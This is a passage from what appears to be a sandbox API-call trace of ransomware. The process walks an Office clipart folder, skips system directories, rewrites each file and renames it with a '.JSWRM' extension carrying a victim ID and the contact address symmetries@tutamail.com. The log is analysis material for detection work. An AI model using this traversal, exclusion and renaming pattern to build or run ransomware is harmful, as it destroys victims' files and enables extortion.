lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285796.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285796.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0088.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0088.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285796.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285796.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.778] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13648) returned 1 [0088.778] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3550) returned 0x24d210 [0088.778] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3550, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3550, lpOverlapped=0x0) returned 1 [0088.783] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.783] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3550, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3550, lpOverlapped=0x0) returned 1 [0088.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.783] CloseHandle (hObject=0x314) returned 1 [0088.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0088.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0088.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0088.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0088.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0088.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0088.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.783] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285796.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285796.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285796.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285796.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0088.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0088.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0088.784] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3946e4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x23f4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0285808.WMF", cAlternateFileName="")) returned 1 [0088.784] lstrcmpiW (lpString1="J0285808.WMF", lpString2=".") returned 1 [0088.784] lstrcmpiW (lpString1="J0285808.WMF", lpString2="..") returned 1 [0088.784] lstrcmpiW (lpString1="J0285808.WMF", lpString2="...") returned 1 [0088.784] lstrcmpiW (lpString1="J0285808.WMF", lpString2="windows") returned -1 [0088.784] lstrcmpiW (lpString1="J0285808.WMF", lpString2="recovery") returned -1 [0088.784] lstrcmpiW (lpString1="J0285808.WMF", lpString2="perflogs") returned -1 [0088.784] lstrcmpiW (lpString1="J0285808.WMF", lpString2="documents and settings") returned 1 [0088.784] lstrcmpiW (lpString1="J0285808.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.784] lstrcmpiW (lpString1="J0285808.WMF", lpString2="system volume information") returned -1 [0088.784] lstrcmpiW (lpString1="J0285808.WMF", lpString2="msocache") returned -1 [0088.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0088.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285808.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285808.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285808.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0088.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0088.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285808.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285808.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285808.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0088.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0088.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0088.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285808.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285808.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.785] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9204) returned 1 [0088.785] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x23f0) returned 0x24d210 [0088.785] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x23f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x23f0, lpOverlapped=0x0) returned 1 [0088.788] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.788] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x23f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x23f0, lpOverlapped=0x0) returned 1 [0088.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.788] CloseHandle (hObject=0x314) returned 1 [0088.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0088.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0088.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0088.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0088.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0088.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.788] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285808.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285808.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285808.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285808.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0088.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0088.789] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3946e4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2210, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0285820.WMF", cAlternateFileName="")) returned 1 [0088.789] lstrcmpiW (lpString1="J0285820.WMF", lpString2=".") returned 1 [0088.789] lstrcmpiW (lpString1="J0285820.WMF", lpString2="..") returned 1 [0088.789] lstrcmpiW (lpString1="J0285820.WMF", lpString2="...") returned 1 [0088.789] lstrcmpiW (lpString1="J0285820.WMF", lpString2="windows") returned -1 [0088.789] lstrcmpiW (lpString1="J0285820.WMF", lpString2="recovery") returned -1 [0088.789] lstrcmpiW (lpString1="J0285820.WMF", lpString2="perflogs") returned -1 [0088.789] lstrcmpiW (lpString1="J0285820.WMF", lpString2="documents and settings") returned 1 [0088.789] lstrcmpiW (lpString1="J0285820.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.789] lstrcmpiW (lpString1="J0285820.WMF", lpString2="system volume information") returned -1 [0088.789] lstrcmpiW (lpString1="J0285820.WMF", lpString2="msocache") returned -1 [0088.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0088.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285820.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285820.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285820.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0088.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0088.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285820.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285820.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285820.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0088.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0088.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0088.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0088.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285820.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285820.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.792] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8720) returned 1 [0088.792] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2210) returned 0x205850 [0088.792] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2210, lpOverlapped=0x0) returned 1 [0088.794] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.794] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2210, lpOverlapped=0x0) returned 1 [0088.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.795] CloseHandle (hObject=0x314) returned 1 [0088.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0088.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0088.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0088.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0088.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0088.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0088.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0088.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0088.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.795] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285820.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285820.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285820.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285820.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0088.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0088.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0088.796] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3946e4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x21a0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0285822.WMF", cAlternateFileName="")) returned 1 [0088.796] lstrcmpiW (lpString1="J0285822.WMF", lpString2=".") returned 1 [0088.796] lstrcmpiW (lpString1="J0285822.WMF", lpString2="..") returned 1 [0088.796] lstrcmpiW (lpString1="J0285822.WMF", lpString2="...") returned 1 [0088.796] lstrcmpiW (lpString1="J0285822.WMF", lpString2="windows") returned -1 [0088.796] lstrcmpiW (lpString1="J0285822.WMF", lpString2="recovery") returned -1 [0088.796] lstrcmpiW (lpString1="J0285822.WMF", lpString2="perflogs") returned -1 [0088.796] lstrcmpiW (lpString1="J0285822.WMF", lpString2="documents and settings") returned 1 [0088.796] lstrcmpiW (lpString1="J0285822.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.796] lstrcmpiW (lpString1="J0285822.WMF", lpString2="system volume information") returned -1 [0088.796] lstrcmpiW (lpString1="J0285822.WMF", lpString2="msocache") returned -1 [0088.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0088.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285822.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285822.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285822.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0088.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285822.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285822.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285822.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0088.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.797] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285822.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285822.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.797] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8608) returned 1 [0088.797] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x21a0) returned 0x205850 [0088.797] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x21a0, lpNumberOfBytesRead=0x345e89c, 